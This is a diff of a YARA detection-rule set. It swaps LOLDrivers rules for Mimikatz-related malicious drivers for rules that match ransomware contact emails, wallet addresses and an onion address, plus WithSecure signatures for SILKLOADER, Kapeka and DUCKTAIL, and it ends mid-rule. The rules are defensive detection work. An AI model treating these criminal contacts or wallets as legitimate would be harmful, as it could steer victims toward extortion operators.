-		logic_hash = "d20bfd9f05a7cdb031f3ada2801ee3b978a9d27407b4425c7aa7eb41b4549b18"
-		score = 70
-		quality = 80
+		description = "Detects files referencing identities associated with Rhysida ransomware"
+		author = "ditekShen"
+		id = "7ee0fb41-9267-5b65-ada3-229f2e390da6"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1688-L1697"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "e3e07bab2982a30a5372e6708ede6707d132d410aa5b5b1a29bdb5d06910a88e"
+		score = 75
+		quality = 71
 		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]006d0069006d006900640072007600200066006f0072002000570069006e0064006f0077007300200028006d0069006d0069006b00610074007a0029 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0031002e0030002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0031002e0030002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006d0069006d0069006400720076 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]006d0069006d006900640072007600200028006d0069006d0069006b00610074007a0029 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006d0069006d0069006400720076002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003000370020002d00200032003000310036002000670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
+		$s1 = "SethZemlak@onionmail.org" ascii wide nocase
+		$s2 = "JacquieKunze@onionmail.org" ascii wide nocase
 
 	condition:
-		all of them
+		any of them
 }
-rule LOLDRIVERS_MAL_Driver_Gentilkiwibenjamindelpy_Mimidrv_Mimidrvmimikatz_0F58
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Payola
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - mimidrv.sys"
-		author = "Florian Roth"
-		id = "0531a88d-cb21-5055-b365-a80b6e99a6e9"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L159-L191"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "0f58e09651d48d2b1bcec7b9f7bb85a2d1a7b65f7a51db281fe0c4f058a48597"
-		hash = "087270d57f1626f29ba9c25750ca19838a869b73a1f71af50bdf37d6ff776212"
-		hash = "0d676baac43d9e2d05b577d5e0c516fba250391ab0cb11232a4b17fd97a51e35"
-		hash = "06ddf49ac8e06e6b83fccba1141c90ea01b65b7db592c54ffe8aa6d30a75c0b8"
-		hash = "eab9b5b7e5fab1c2d7d44cd28f13ae8bb083d9362d2b930d43354a3dfd38e05a"
-		hash = "627e13da6a45006fff4711b14754f9ccfac9a5854d275da798a22f3a68dd1eaa"
-		hash = "b169a5f643524d59330fafe6e3e328e2179fc5116ee6fae5d39581467d53ac03"
-		hash = "dfc80e0d468a2c115a902aa332a97e3d279b1fc3d32083e8cf9a4aadf3f54ad1"
-		hash = "a74e8f94d2c140646a8bb12e3e322c49a97bd1b8a2e4327863d3623f43d65c66"
-		hash = "94ba4bcbdb55d6faf9f33642d0072109510f5c57e8c963d1a3eb4f9111f30112"
-		hash = "07759750fbb93c77b5c3957c642a9498fcff3946a5c69317db8d6be24098a4a0"
-		hash = "4dc24fd07f8fb854e685bc540359c59f177de5b91231cc44d6231e33c9e932b1"
-		hash = "baf7fbc4743a81eb5e4511023692b2dfdc32ba670ba3e4ed8c09db7a19bd82d3"
-		hash = "bcca03ce1dd040e67eb71a7be0b75576316f0b6587b2058786fda8b6f0a5adfd"
-		logic_hash = "ffa3eaf9032aa673119558217d212ff819ce91e99ab6c046f8801990d5826689"
-		score = 70
-		quality = 80
+		description = "Detects files referencing identities associated with Payola ransomware"
+		author = "ditekShen"
+		id = "7c1fc06b-fc71-5679-befd-686b2e05e3a4"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1699-L1708"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "568141c03d14faef0cfc4f5fbdec45a5109a1ad5cbbe99e76a1db86e7ef4dc5d"
+		score = 75
+		quality = 71
 		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]006d0069006d006900640072007600200066006f0072002000570069006e0064006f0077007300200028006d0069006d0069006b00610074007a0029 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0030002e0030002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0030002e0030002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006d0069006d0069006400720076 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]006d0069006d006900640072007600200028006d0069006d0069006b00610074007a0029 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006d0069006d0069006400720076002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003000370020002d00200032003000310034002000670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
+		$s1 = "pcsupport@skiff.com" ascii wide nocase
+		$s2 = "pctalk01@tutanota.com" ascii wide nocase
 
 	condition:
-		all of them
+		any of them
 }
-rule LOLDRIVERS_MAL_Driver_Gentilkiwibenjamindelpy_Mimidrv_Mimidrvmimikatz_7662
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Xorist
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - mimidrv.sys"
-		author = "Florian Roth"
-		id = "2bb58484-03d2-5ccc-b165-cfe405f60f03"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L194-L235"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "7662187c236003308a7951c2f49c0768636c492f8935292d02f69e59b01d236d"
-		hash = "a85d3fd59bb492a290552e5124bfe3f9e26a3086d69d42ccc44737b5a66673ec"
-		hash = "60ee78a2b070c830fabb54c6bde0d095dff8fad7f72aa719758b3c41c72c2aa9"
-		hash = "b2486f9359c94d7473ad8331b87a9c17ca9ba6e4109fd26ce92dff01969eaa09"
-		hash = "d41e39215c2c1286e4cd3b1dc0948adefb161f22bc3a78756a027d41614ee4ff"
-		hash = "008fa89822b7a1f91e5843169083202ea580f7b06eb6d5cae091ba844d035f25"
-		hash = "8206ce9c42582ac980ff5d64f8e3e310bc2baa42d1a206dd831c6ab397fbd8fe"
-		hash = "aafa642ca3d906138150059eeddb6f6b4fe9ad90c6174386cfe13a13e8be47d9"
-		hash = "fefc070a5f6a9c0415e1c6f44512a33e8d163024174b30a61423d00d1e8f9bf2"
-		hash = "6964a5d85639baee288555797992861232e75817f93028b50b8c6d34aa38b05b"
-		hash = "443c0ba980d4db9213b654a45248fd855855c1cc81d18812cae9d16729ff9a85"
-		hash = "e8743094f002239a8a9d6d7852c7852e0bb63cd411b007bd8c194bcba159ef15"
-		hash = "ec96b15ce218f97ec1d8f07f13b052d274c4c8438f31daf246ccfaaee5e1bebd"
-		hash = "beef40f1b4ce0ff2ee5c264955e6b2a0de6fe4089307510378adc83fad77228b"
-		hash = "e858de280bd72d7538386a73e579580a6d5edba87b66b3671dc180229368be19"
-		hash = "21617210249d2a35016e8ca6bd7a1edda25a12702a2294d56010ee8148637f5a"
-		hash = "02ebf848fa618eba27065db366b15ee6629d98f551d20612ac38b9f655f37715"
-		hash = "40556dd9b79b755cc0b48d3d024ceb15bd2c0e04960062ab2a85cd7d4d1b724a"
-		hash = "8b30b2dc36d5e8f1ffc7281352923773fb821cdf66eb6516f82c697a524b599b"
-		hash = "2ce4f8089b02017cbe86a5f25d6bc69dd8b6f5060c918a64a4123a5f3be1e878"
-		hash = "d7aa8abdda8a68b8418e86bef50c19ef2f34bc66e7b139e43c2a99ab48c933be"
-		hash = "82ac05fefaa8c7ee622d11d1a378f1d255b647ab2f3200fd323cc374818a83f2"
-		hash = "c7cd14c71bcac5420872c3d825ff6d4be6a86f3d6a8a584f1a756541efff858e"
-		logic_hash = "089f046e94a9cb4f576896e90375d6dbcaef61aa302af07f80230a74bc33ed18"
-		score = 70
-		quality = 80
+		description = "Detects files referencing identities associated with Xorist ransomware"
+		author = "ditekShen"
+		id = "151d182c-c60a-54dd-a3d2-b32d27521b57"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1710-L1723"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "5975a730ad1a1f7e54e95ec5897aa2940ccc3ed1aa8e83b38cb7ac836c233208"
+		score = 75
+		quality = 67
 		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]006d0069006d006900640072007600200066006f0072002000570069006e0064006f0077007300200028006d0069006d0069006b00610074007a0029 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0031002e0031002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0031002e0031002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006d0069006d0069006400720076 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]006d0069006d006900640072007600200028006d0069006d0069006b00610074007a0029 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006d0069006d0069006400720076002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003000370020002d00200032003000310037002000670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
+		$s1 = "@root_backdoor_synaptics_V" ascii wide nocase
+		$s2 = "@DosX_Plus" ascii wide nocase
+		$s3 = "@Cinoshi_Adm" ascii wide nocase
+		$s4 = "@ac3ss0r" ascii wide nocase
+		$s5 = "MCwRK1Z7K4GYHt9ZrbTR2SMCEqzqQaTbRF" ascii wide
+		$s6 = "0x334F093c9De6552AF4cC0B252dA82aC77FeB467D" ascii wide
 
 	condition:
-		all of them
+		any of them
 }
-rule LOLDRIVERS_MAL_Driver_Gentilkiwibenjamindelpy_Mimidrv_Mimidrvmimikatz_14B8
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Blackhunt
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - mimidrv.sys"
-		author = "Florian Roth"
-		id = "a9965f8f-4969-52ae-953f-a06d8fabe951"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L238-L287"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "14b89298134696f2fd1b1df0961d36fa6354721ea92498a349dc421e79447925"
-		hash = "36c65aeb255c06898ffe32e301030e0b74c8bca6fe7be593584b8fdaacd4e475"
-		hash = "673bbc7fa4154f7d99af333014e888599c27ead02710f7bc7199184b30b38653"
-		hash = "5295080de37d4838e15dec4e3682545033d479d3d9ac28d74747c086559fb968"
-		hash = "8684aec77b4c3cafc1a6594de7e95695fa698625d4206a6c4b201875f76a5b38"
-		hash = "69866557566c59772f203c11f5fba30271448e231b65806a66e48f41e3804d7f"
-		hash = "a42f4ae69b8755a957256b57eb3d319678eab81705f0ffea0d649ace7321108f"
-		hash = "62036cdf3663097534adf3252b921eed06b73c2562655eae36b126c7d3d83266"
-		hash = "1ef7afea0cf2ef246ade6606ef8b7195de9cd7a3cd7570bff90ba1e2422276f6"
-		hash = "b34e2d9f3d4ef59cf7af18e17133a6a06509373e69e33c8eecb2e30501d0d9e4"
-		hash = "0aab2deae90717a8876d46d257401d265cf90a5db4c57706e4003c19eee33550"
-		hash = "15cf366f7b3ee526db7ce2b5253ffebcbfaa4f33a82b459237c049f854a97c0c"
-		hash = "c4c9c84b211899ceb0d18a839afa497537a7c7c01ab481965a09788a9e16590c"
-		hash = "618b15970671700188f4102e5d0638184e2723e8f57f7e917fa49792daebdadb"
-		hash = "4bca0a401b364a5cc1581a184116c5bafa224e13782df13272bc1b748173d1be"
-		hash = "c7bccc6f38403def4690e00a0b31eda05973d82be8953a3379e331658c51b231"
-		hash = "822982c568b6f44b610f8dc4ab5d94795c33ae08a6a608050941264975c1ecdb"
-		hash = "b8c71e1844e987cd6f9c2baf28d9520d4ccdd8593ce7051bb1b3c9bf1d97076a"
-		hash = "26bea3b3ab2001d91202f289b7e41499d810474607db7a0893ceab74f5532f47"
-		hash = "c8ae217860f793fce3ad0239d7b357dba562824dd7177c9d723ca4d4a7f99a12"
-		hash = "a78c9871da09fab21aec9b88a4e880f81ecb1ed0fa941f31cc2f041067e8e972"
-		hash = "82b7fa34ad07dbf9afa63b2f6ed37973a1b4fe35dee90b3cf5c788c15c9f08f7"
-		hash = "6d68d8a71a11458ddf0cbb73c0f145bee46ef29ce03ad7ece6bd6aa9d31db9b7"
-		hash = "52f3905bbd97dcd2dbd22890e5e8413b9487088f1ee2fa828030a6a45b3975fd"
-		hash = "64d4370843a07e25d4ceb68816015efcaeca9429bb5bb692a88e615b48c7da96"
-		hash = "f3ec3f22639d45b3c865bb1ed7622db32e04e1dbc456298be02bf1f3875c3aac"
-		hash = "51805bb537befaac8ce28f2221624cb4d9cefdc0260bc1afd5e0bc97bf1f9f93"
-		hash = "c4fb31e3f24e40742a1b9855a2d67048fe64b26d8d2dbcec77d2d5deeded2bcc"
-		hash = "d50cb5f4b28c6c26f17b9d44211e515c3c0cc2c0c4bf24cd8f9ed073238053ad"
-		hash = "4999541c47abd4a7f2a002c180ae8d31c19804ce538b85870b8db53d3652862b"
-		hash = "a32dc2218fb1f538fba33701dfd9ca34267fda3181e82eb58b971ae8b78f0852"
-		logic_hash = "e4d4b0da09beff889931b8d90365c3a04ff4b5b410004fb820cb2551365cf63c"
-		score = 70
-		quality = 80
+		description = "Detects files referencing identities associated with BlackHunt ransomware"
+		author = "ditekShen"
+		id = "87613fcc-7d9a-57ba-9653-c48760dd5ef0"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1725-L1739"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "6b875d4abdedc8032f89ab3cbdf4acdc855d83b5bcc08f96b2fbc38b4a5daa7f"
+		score = 75
+		quality = 61
 		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]006d0069006d006900640072007600200066006f0072002000570069006e0064006f0077007300200028006d0069006d0069006b00610074007a0029 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0031002e0030002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0031002e0030002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006d0069006d0069006400720076 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]006d0069006d006900640072007600200028006d0069006d0069006b00610074007a0029 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006d0069006d0069006400720076002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003000370020002d00200032003000310037002000670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
+		$s1 = "onion746@onionmail.com" ascii wide nocase
+		$s2 = "amike1096@gmail.com" ascii wide nocase
+		$s3 = "decryptyourdata@msgsafe.io" ascii wide nocase
+		$s4 = "decryptyourdata@onionmail.org" ascii wide nocase
+		$s5 = "Teikobest@gmail.com" ascii wide nocase
+		$s6 = "Loxoclash@gmail.com" ascii wide nocase
+		$s7 = "://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion" ascii wide nocase
 
 	condition:
-		all of them
+		any of them
 }
-rule LOLDRIVERS_MAL_Driver_Gentilkiwibenjamindelpy_Mimidrv_Mimidrvmimikatz_41AD
+/*
+ * YARA Rule Set
+ * Repository Name: WithSecureLabs
+ * Repository: https://github.com/WithSecureLabs/iocs
+ * Retrieval Date: 2025-06-15
+ * Git Commit: a5e50e76f7829cbab219bec94bf1887dea9bb304
+ * Number of Rules: 5
+ * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
+ *
+ *
+ * LICENSE
+ *
+ * BSD 2-Clause License
+
+Copyright (c) [2022], [WithSecure Oyj]
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this
+   list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright notice,
+   this list of conditions and the following disclaimer in the documentation
+   and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+rule WITHSECURELABS_SILKLOADER
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - mimidrv.sys"
-		author = "Florian Roth"
-		id = "8a8887dd-0f3d-5ab4-a945-b47966789b99"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L290-L324"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "41ad660820c41fc8b1860b13dc1fea8bc8cb2faceb36ed3e29d40d28079d2b1f"
-		hash = "a7a665a695ec3c0f862a0d762ad55aff6ce6014359647e7c7f7e3c4dc3be81b7"
-		hash = "9a42fa1870472c38a56c0a70f62e57a3cdc0f5bc142f3a400d897b85d65800ac"
-		hash = "f6157e033a12520c73dcedf8e49cd42d103e5874c34d6527bb9de25a5d26e5ad"
-		hash = "31b66a57fae0cc28a6a236d72a35c8b6244f997e700f9464f9cbf800dbf8bee6"
-		hash = "1d23ab46ad547e7eef409b40756aae9246fbdf545d13946f770643f19c715e80"
-		hash = "704c6ffe786bc83a73fbdcd2edd50f47c3b5053da7da6aa4c10324d389a31db4"
-		hash = "200f98655d1f46d2599c2c8605ebb7e335fee3883a32135ca1a81e09819bc64a"
-		hash = "4bd4715d2a7af627da11513e32fab925c872babebdb7ff5675a75815fbf95021"
-		hash = "9e56e96df36237e65b3d7dbc490afdc826215158f6278cd579c576c4b455b392"
-		hash = "8b32fc8b15363915605c127ccbf5cbe71778f8dfbf821a25455496e969a01434"
-		hash = "b0a27ac1a8173413de13860d2b2e34cb6bc4d1149f94b62d319042e11d8b004c"
-		hash = "07beac65e28ee124f1da354293a3d6ad7250ed1ce29b8342acfd22252548a5af"
-		hash = "c4f041de66ec8cc5ab4a03bbc46f99e073157a4e915a9ab4069162de834ffc5c"
-		hash = "26ef7b27d1afb685e0c136205a92d29b1091e3dcf6b7b39a4ec03fbbdb57cb55"
-		hash = "406b844f4b5c82caf26056c67f9815ad8ecf1e6e5b07d446b456e5ff4a1476f9"
-		logic_hash = "a51e3e4c17122bf15b70b47693c3d24792cc7c7cbead1b26e501cb2907113968"
-		score = 70
-		quality = 80
+		description = "Detects SILKLOADER samples"
+		author = "WithSecure"
+		id = "bb8a543e-fdbf-5be1-901e-3e2a9965fd62"
+		date = "2023-03-15"
+		modified = "2023-03-15"
+		reference = "https://labs.withsecure.com/publications/silkloader"
+		source_url = "https://github.com/WithSecureLabs/iocs/blob/a5e50e76f7829cbab219bec94bf1887dea9bb304/SILKLOADER/silkloader.yar#L2-L20"
+		license_url = "https://github.com/WithSecureLabs/iocs/blob/a5e50e76f7829cbab219bec94bf1887dea9bb304/LICENSE"
+		logic_hash = "48aa249ea78e5a3bfe9934fd0dfa26b79f9e6cbe1e5b1426b84f8d8a3d77d742"
+		score = 75
+		quality = 75
 		tags = ""
+		version = "1.0"
+		hash1 = "c83ac6dc96febd49c7c558e8cf85dd8bcb3a84fdc78b3ba72ebf681566dc1865"
+		hash2 = "e4dadabd1cee7215ff6e31e01f6b0dd820851685836592a14f982f2c7972fc25"
+		hash3 = "d77a59e6ba3a8f3c000a8a8955af77d2898f220f7bf3c0968bf0d7c8ac25a5ad"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]006d0069006d006900640072007600200066006f0072002000570069006e0064006f0077007300200028006d0069006d0069006b00610074007a0029 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0032002e0030002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0032002e0030002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006d0069006d0069006400720076 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]006d0069006d006900640072007600200028006d0069006d0069006b00610074007a0029 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006d0069006d0069006400720076002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003000370020002d00200032003000310039002000670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
+		$str1 = {5400520041004e005300460045005200}
+		$str2 = {760062006300630073006200}
 
 	condition:
-		all of them
+		pe.is_pe and pe.characteristics & pe.DLL and all of them
 }
-rule LOLDRIVERS_MAL_Driver_Sensecorp_42B2
+
+rule WITHSECURELABS_Kapeka_Backdoor : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - Sense5Ext.sys"
-		author = "Florian Roth"
-		id = "6b64ff77-866b-5d77-b2cf-5e507acc6cb9"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L327-L343"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "42b22faa489b5de936db33f12184f6233198bdf851a18264d31210207827ba25"
-		logic_hash = "72e213913bf4317fa0751775e6a1a82ba2706e79c52fcd3e2c8ca69050e3a9d7"
-		score = 70
-		quality = 80
-		tags = ""
+		description = "Detects Kapeka backdoor based on common strings."
+		author = "WithSecure"
+		id = "7b874a4a-a009-5365-9c31-ca61bf5ab491"
+		date = "2024-04-17"
+		modified = "2024-04-17"
+		reference = "https://labs.withsecure.com/publications/kapeka"
+		source_url = "https://github.com/WithSecureLabs/iocs/blob/a5e50e76f7829cbab219bec94bf1887dea9bb304/Kapeka/kapeka_backdoor.yar#L2-L21"
+		license_url = "https://github.com/WithSecureLabs/iocs/blob/a5e50e76f7829cbab219bec94bf1887dea9bb304/LICENSE"
+		logic_hash = "49795c6e3f3690eeccd731a9ba0c6bd8d5840d9171939e71d3a4d6f0d1834f05"
+		score = 75
+		quality = 25
+		tags = "FILE"
+		version = "1.0"
+		hash1 = "97e0e161d673925e42cdf04763e7eaa53035338b"
+		hash2 = "9bbde40cab30916b42e59208fbcc09affef525c1"
+		hash3 = "6c3441b5a4d3d39e9695d176b0e83a2c55fe5b4e"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00530065006e0073006500350020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00530065006e00730065003500200043004f00520050 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0035002e0030002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0035002e0030002e0030 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000320032 }
+		$a = "Azbi3l1xIgcRzTsOHopgrwUdJUMWpOFt" ascii
+		$b = "PID : " wide
+		$c = "ExitCode : " wide
+		$d = "1: " wide
+		$e = "2: " wide
 
 	condition:
-		all of them
+		pe.is_dll( ) and filesize > 50000 and filesize < 500000 and 4 of them
 }
-rule LOLDRIVERS_MAL_Driver_Legalcorp_Pciexpressvideocapture_FD22
+rule WITHSECURELABS_Ducktail_Dotnet_Core_Infostealer : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - PcieCubed.sys"
-		author = "Florian Roth"
-		id = "c9b28922-d4c7-5c09-9df8-b7b8d8ffc2e8"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L346-L364"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "fd223833abffa9cd6cc1848d77599673643585925a7ee51259d67c44d361cce8"
-		logic_hash = "4c47a159595f420c520e6924238bd260f49ccf163208713c72c62638b13756d9"
-		score = 70
-		quality = 80
-		tags = ""
+		description = "Detects DUCKTAIL malware written in .NET Core"
+		author = "WithSecure"
+		id = "22eef7ce-9e11-55ec-9f0b-00a6776f8eee"
+		date = "2022-07-18"
+		modified = "2022-07-25"
+		reference = "https://labs.withsecure.com/publications/ducktail"
+		source_url = "https://github.com/WithSecureLabs/iocs/blob/a5e50e76f7829cbab219bec94bf1887dea9bb304/DUCKTAIL/ducktail_dotnet_core_infostealer.yar#L1-L103"
+		license_url = "https://github.com/WithSecureLabs/iocs/blob/a5e50e76f7829cbab219bec94bf1887dea9bb304/LICENSE"
+		logic_hash = "81b4da5860894397e9cd416e451c3098f8560407cd79f070f8edd5a3ba91512a"
+		score = 75
+		quality = 50
+		tags = "FILE"
+		version = "1.0"
+		hash1 = "b260f3857990e11fa267d3f1cad4c9bed59a9d4b"
+		hash2 = "db74863c01817bf4eba39cd8a0ebbce9bda85a37"
+		hash3 = "3a4b395301f61b7e6afc0ab27dc02331455181d0"
 
 	strings:
